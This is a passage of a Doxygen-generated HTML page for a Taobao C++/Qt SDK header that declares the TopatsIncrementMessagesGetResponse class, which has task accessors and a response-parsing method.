href="dir_5ced2c06884fa9bf5c2da90298abd959.html">TaoApiCpp</a></li><li class="navelem"><a class="el" href="dir_b6b3a706edffae716cf3dcaba65ad0ec.html">response</a></li> </ul> </div> </div><!-- top --> <div class="header"> <div class="headertitle"> <div class="title">TopatsIncrementMessagesGetResponse.h</div> </div> </div><!--header--> <div class="contents"> <a href="TopatsIncrementMessagesGetResponse_8h.html">Go to the documentation of this file.</a><div class="fragment"><div class="line"><a name="l00001"></a><span class="lineno"> 1</span>&#160;<span class="preprocessor">#ifndef TOPATSINCREMENTMESSAGESGETRESPONSE_H</span></div> <div class="line"><a name="l00002"></a><span class="lineno"> 2</span>&#160;<span class="preprocessor"></span><span class="preprocessor">#define TOPATSINCREMENTMESSAGESGETRESPONSE_H</span></div> <div class="line"><a name="l00003"></a><span class="lineno"> 3</span>&#160;<span class="preprocessor"></span></div> <div class="line"><a name="l00004"></a><span class="lineno"> 4</span>&#160;<span class="preprocessor">#include &lt;<a class="code" href="TaoResponse_8h.html">TaoApiCpp/TaoResponse.h</a>&gt;</span></div> <div class="line"><a name="l00005"></a><span class="lineno"> 5</span>&#160;<span class="preprocessor">#include &lt;<a class="code" href="Task_8h.html">TaoApiCpp/domain/Task.h</a>&gt;</span></div> <div class="line"><a name="l00006"></a><span class="lineno"> 6</span>&#160;</div> <div class="line"><a name="l00007"></a><span class="lineno"> 7</span>&#160;</div> <div class="line"><a name="l00013"></a><span class="lineno"><a class="code" href="classTopatsIncrementMessagesGetResponse.html"> 13</a></span>&#160;<span class="keyword">class </span><a class="code" href="classTopatsIncrementMessagesGetResponse.html" title="TOP RESPONSE API: 异步获取增量消息数据">TopatsIncrementMessagesGetResponse</a> : <span class="keyword">public</span> <a class="code" href="classTaoResponse.html">TaoResponse</a></div> <div class="line"><a name="l00014"></a><span class="lineno"> 14</span>&#160;{</div> <div class="line"><a name="l00015"></a><span class="lineno"> 15</span>&#160;<span class="keyword">public</span>:</div> <div class="line"><a name="l00016"></a><span class="lineno"><a class="code" href="classTopatsIncrementMessagesGetResponse.html#ab7096364ac5f92ba3d4e2b2b8ae9522c"> 16</a></span>&#160; <span class="keyword">virtual</span> <a class="code" href="classTopatsIncrementMessagesGetResponse.html#ab7096364ac5f92ba3d4e2b2b8ae9522c">~TopatsIncrementMessagesGetResponse</a>() { }</div> <div class="line"><a name="l00017"></a><span class="lineno"> 17</span>&#160;</div> <div class="line"><a name="l00018"></a><span class="lineno"> 18</span>&#160; <a class="code" href="classTask.html" title="批量异步任务结果">Task</a> <a class="code" href="classTopatsIncrementMessagesGetResponse.html#a589b5da7ff41e34f2416b7be9001601c">getTask</a>() <span class="keyword">const</span>;</div> <div class="line"><a name="l00019"></a><span class="lineno"> 19</span>&#160; <span class="keywordtype">void</span> <a class="code" href="classTopatsIncrementMessagesGetResponse.html#a27ebca7b969fdb6c7ccd2f92dba99efc">setTask</a> (<a class="code" href="classTask.html" title="批量异步任务结果">Task</a> <a class="code" href="classTopatsIncrementMessagesGetResponse.html#a3f0ead650715fd639b8507412c635407" title="创建任务信息。里面只包含task_id和created">task</a>);</div> <div class="line"><a name="l00020"></a><span class="lineno"> 20</span>&#160; <span class="keyword">virtual</span> <span class="keywordtype">void</span> <a class="code" href="classTopatsIncrementMessagesGetResponse.html#ad89856b0a222ebb4e45d76c24e04b9cb">parseNormalResponse</a>();</div> <div class="line"><a name="l00021"></a><span class="lineno"> 21</span>&#160;</div> <div class="line"><a name="l00022"></a><span class="lineno"> 22</span>&#160; <span class="keyword">private</span>:</div> <div class="line"><a name="l00026"></a><span class="lineno"><a class="code" href="classTopatsIncrementMessagesGetResponse.html#a3f0ead650715fd639b8507412c635407"> 26</a></span>&#160; <a class="code" href="classTask.html" title="批量异步任务结果">Task</a> <a class="code" href="classTopatsIncrementMessagesGetResponse.html#a3f0ead650715fd639b8507412c635407" title="创建任务信息。里面只包含task_id和created">task</a>;</div> <div class="line"><a name="l00027"></a><span class="lineno"> 27</span>&#160;</div> <div class="line"><a name="l00028"></a><span class="lineno"> 28</span>&#160;};</div> <div class="line"><a name="l00029"></a><span class="lineno"> 29</span>&#160;</div> <div class="line"><a name="l00030"></a><span class="lineno"> 30</span>&#160;<span class="preprocessor">#endif</span></div> </div><!-- fragment --></div><!-- contents --> <!-- start footer part --> <hr class="footer"/><address class="footer"><small> Generated on Sun Apr 14 2013 16:25:36 for Taobao Cpp/Qt SDK by &#160;<a href="http://www.doxygen.org/index.html"> <img class="footer" src="doxygen.png" alt="doxygen"/> </a> 1.8.3.1 </small></address> </body> </html>